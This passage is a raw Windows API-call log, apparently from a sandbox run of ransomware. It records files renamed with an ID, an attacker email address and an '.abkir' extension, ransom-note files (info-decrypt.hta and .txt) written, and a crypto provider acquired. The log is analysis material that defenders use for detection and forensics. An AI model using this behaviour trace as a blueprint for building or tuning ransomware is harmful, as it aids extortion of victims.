[0214.838] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x2 [0214.838] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=2, puBuffLength=0x691f2d0*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d0*=0x20, pszText=0x0) returned 0x0 [0214.838] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=2, puBuffLength=0x691f2d0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0214.838] IWbemServices:GetObject (in: This=0x603352c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x691f284*=0x0, ppCallResult=0x0 | out: ppObject=0x691f284*=0x6027e50, ppCallResult=0x0) returned 0x0 [0215.080] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ea0, puCount=0x691f284 | out: puCount=0x691f284*=0x2) returned 0x0 [0215.080] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=4, puBuffLength=0x691f280*=0x0, pszText=0x0 | out: puBuffLength=0x691f280*=0xf, pszText=0x0) returned 0x0 [0215.080] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=4, puBuffLength=0x691f280*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f280*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0215.080] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36163c4*=0, plFlavor=0x36163c8*=0 | out: pVal=0x691f280*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36163c4*=8, plFlavor=0x36163c8*=0) returned 0x0 [0215.081] SysStringByteLen (bstr="9C354B42") returned 0x10 [0215.081] SysStringByteLen (bstr="9C354B42") returned 0x10 [0215.081] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36163c4*=8, plFlavor=0x36163c8*=0 | out: pVal=0x691f288*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36163c4*=8, plFlavor=0x36163c8*=0) returned 0x0 [0215.081] SysStringByteLen (bstr="9C354B42") returned 0x10 [0215.081] SysStringByteLen (bstr="9C354B42") returned 0x10 [0215.081] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", lpFilePart=0x0) returned 0x44 [0215.081] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x67 [0215.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2e8) returned 1 [0215.081] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), fInfoLevelId=0x0, lpFileInformation=0x691f364 | out: lpFileInformation=0x691f364*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c015050, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0x39345b80, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0215.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2e4) returned 1 [0215.081] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), lpNewFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0215.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0215.454] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache", lpFilePart=0x0) returned 0x3f [0215.454] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\", lpFilePart=0x0) returned 0x40 [0215.455] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f650 [0215.455] FindNextFileW (in: hFindFile=0xb7f650, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0215.455] FindNextFileW (in: hFindFile=0xb7f650, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9de525d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2caa5f40, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40270, dwReserved0=0x0, dwReserved1=0x0, cFileName="cache.dat", cAlternateFileName="")) returned 1 [0215.455] FindNextFileW (in: hFindFile=0xb7f650, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0215.456] FindClose (in: hFindFile=0xb7f650 | out: hFindFile=0xb7f650) returned 1 [0215.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0215.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0215.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0215.456] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache", lpFilePart=0x0) returned 0x3f [0215.456] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\", lpFilePart=0x0) returned 0x40 [0215.456] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f650 [0215.456] FindNextFileW (in: hFindFile=0xb7f650, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0215.457] FindNextFileW (in: hFindFile=0xb7f650, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9de525d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2caa5f40, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40270, dwReserved0=0x0, dwReserved1=0x0, cFileName="cache.dat", cAlternateFileName="")) returned 1 [0215.457] FindNextFileW (in: hFindFile=0xb7f650, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9de525d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2caa5f40, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40270, dwReserved0=0x0, dwReserved1=0x0, cFileName="cache.dat", cAlternateFileName="")) returned 0 [0215.457] FindClose (in: hFindFile=0xb7f650 | out: hFindFile=0xb7f650) returned 1 [0215.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0215.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0215.457] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat", nBufferLength=0x105, lpBuffer=0x691ee50, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat", lpFilePart=0x0) returned 0x49 [0215.457] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\info-decrypt.hta", lpFilePart=0x0) returned 0x50 [0215.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b8) returned 1 [0215.457] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f334 | out: lpFileInformation=0x691f334*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0215.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b4) returned 1 [0215.458] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat", nBufferLength=0x105, lpBuffer=0x691ee50, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat", lpFilePart=0x0) returned 0x49 [0215.458] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ecf8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\info-decrypt.hta", lpFilePart=0x0) returned 0x50 [0215.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1ec) returned 1 [0215.458] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320 [0215.458] GetFileType (hFile=0x320) returned 0x1 [0215.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e8) returned 1 [0215.458] GetFileType (hFile=0x320) returned 0x1 [0215.459] WriteFile (in: hFile=0x320, lpBuffer=0x36de9b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x691f2b0, lpOverlapped=0x0 | out: lpBuffer=0x36de9b8*, lpNumberOfBytesWritten=0x691f2b0*=0x1000, lpOverlapped=0x0) returned 1 [0215.460] WriteFile (in: hFile=0x320, lpBuffer=0x36de9b8*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x691f284, lpOverlapped=0x0 | out: lpBuffer=0x36de9b8*, lpNumberOfBytesWritten=0x691f284*=0x55e, lpOverlapped=0x0) returned 1 [0215.460] CloseHandle (hObject=0x320) returned 1 [0215.461] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat", nBufferLength=0x105, lpBuffer=0x691ee58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat", lpFilePart=0x0) returned 0x49 [0215.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f304) returned 1 [0215.461] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), fInfoLevelId=0x0, lpFileInformation=0x36df9d4 | out: lpFileInformation=0x36df9d4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9de525d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2caa5f40, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40270)) returned 1 [0215.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f300) returned 1 [0215.461] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat", nBufferLength=0x105, lpBuffer=0x691ed44, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat", lpFilePart=0x0) returned 0x49 [0215.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f238) returned 1 [0215.461] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0215.461] GetFileType (hFile=0x320) returned 0x1 [0215.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f234) returned 1 [0215.461] GetFileType (hFile=0x320) returned 0x1 [0215.461] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x691f340 | out: lpFileSizeHigh=0x691f340*=0x0) returned 0x40270 [0215.462] ReadFile (in: hFile=0x320, lpBuffer=0x547ddf0, nNumberOfBytesToRead=0x40270, lpNumberOfBytesRead=0x691f2ec, lpOverlapped=0x0 | out: lpBuffer=0x547ddf0*, lpNumberOfBytesRead=0x691f2ec*=0x40270, lpOverlapped=0x0) returned 1 [0215.467] CloseHandle (hObject=0x320) returned 1 [0215.468] CryptAcquireContextW (in: phProv=0x691f28c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f28c*=0xbe0690) returned 1 [0215.469] CryptGenRandom (in: hProv=0xbe0690, dwLen=0x10, pbBuffer=0x36dff2c | out: pbBuffer=0x36dff2c) returned 1 Thread: id = 118 os_tid = 0x2c4 [0132.311] SysReAllocStringLen (in: pbstr=0x937f784*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x937f784*="KERNEL32.DLL") returned 1 [0132.311] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0132.311] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0132.315] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0132.315] SysReAllocStringLen (in: pbstr=0x937f784*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x937f784*="KERNEL32.DLL") returned 1 [0132.315] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0132.315] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0132.318] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0132.318] SysReAllocStringLen (in: pbstr=0x937f760*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x937f760*="KERNEL32.DLL") returned 1 [0132.318] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0132.318] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0132.320] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0132.323] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0132.324] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0132.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x937f0ac) returned 1 [0132.324] GetFullPathNameW (in: lpFileName="C:\\Recovery", nBufferLength=0x105, lpBuffer=0x937ebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery", lpFilePart=0x0) returned 0xb [0132.324] GetFullPathNameW (in: lpFileName="C:\\Recovery\\", nBufferLength=0x105, lpBuffer=0x937eb88, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\", lpFilePart=0x0) returned 0xc [0132.324] FindFirstFileW (in: lpFileName="C:\\Recovery\\*", lpFindFileData=0x937edd4 | out: lpFindFileData=0x937edd4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xfcd49ba0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd49ba0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.325] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x937ede4 | out: lpFindFileData=0x937ede4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xfcd49ba0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd49ba0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.325] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x937ede4 | out: lpFindFileData=0x937ede4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0132.325] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x937ede4 | out: lpFindFileData=0x937ede4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfcd49ba0, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfcd49ba0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd49ba0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0132.325] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x937ede4 | out: lpFindFileData=0x937ede4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.325] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937f06c) returned 1 [0132.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937f078) returned 1 [0132.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x937f0ac) returned 1 [0132.325] GetFullPathNameW (in: lpFileName="C:\\Recovery", nBufferLength=0x105, lpBuffer=0x937ebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery", lpFilePart=0x0) returned 0xb [0132.325] GetFullPathNameW (in: lpFileName="C:\\Recovery\\", nBufferLength=0x105, lpBuffer=0x937eb88, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\", lpFilePart=0x0) returned 0xc [0132.326] FindFirstFileW (in: lpFileName="C:\\Recovery\\*", lpFindFileData=0x937edd4 | out: lpFindFileData=0x937edd4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xfcd49ba0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd49ba0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.326] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x937ede4 | out: lpFindFileData=0x937ede4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xfcd49ba0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd49ba0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.326] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x937ede4 | out: lpFindFileData=0x937ede4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0132.627] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x937ede4 | out: lpFindFileData=0x937ede4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfcd49ba0, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfcd49ba0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd49ba0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0132.627] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x937ede4 | out: lpFindFileData=0x937ede4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfcd49ba0, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfcd49ba0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd49ba0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 0 [0132.628] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937f06c) returned 1 [0132.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937f078) returned 1 [0132.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x937f05c) returned 1 [0132.629] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b", nBufferLength=0x105, lpBuffer=0x937eb64, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpFilePart=0x0) returned 0x30 [0132.629] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", nBufferLength=0x105, lpBuffer=0x937eb38, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpFilePart=0x0) returned 0x31 [0132.629] FindFirstFileW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x937ed84 | out: 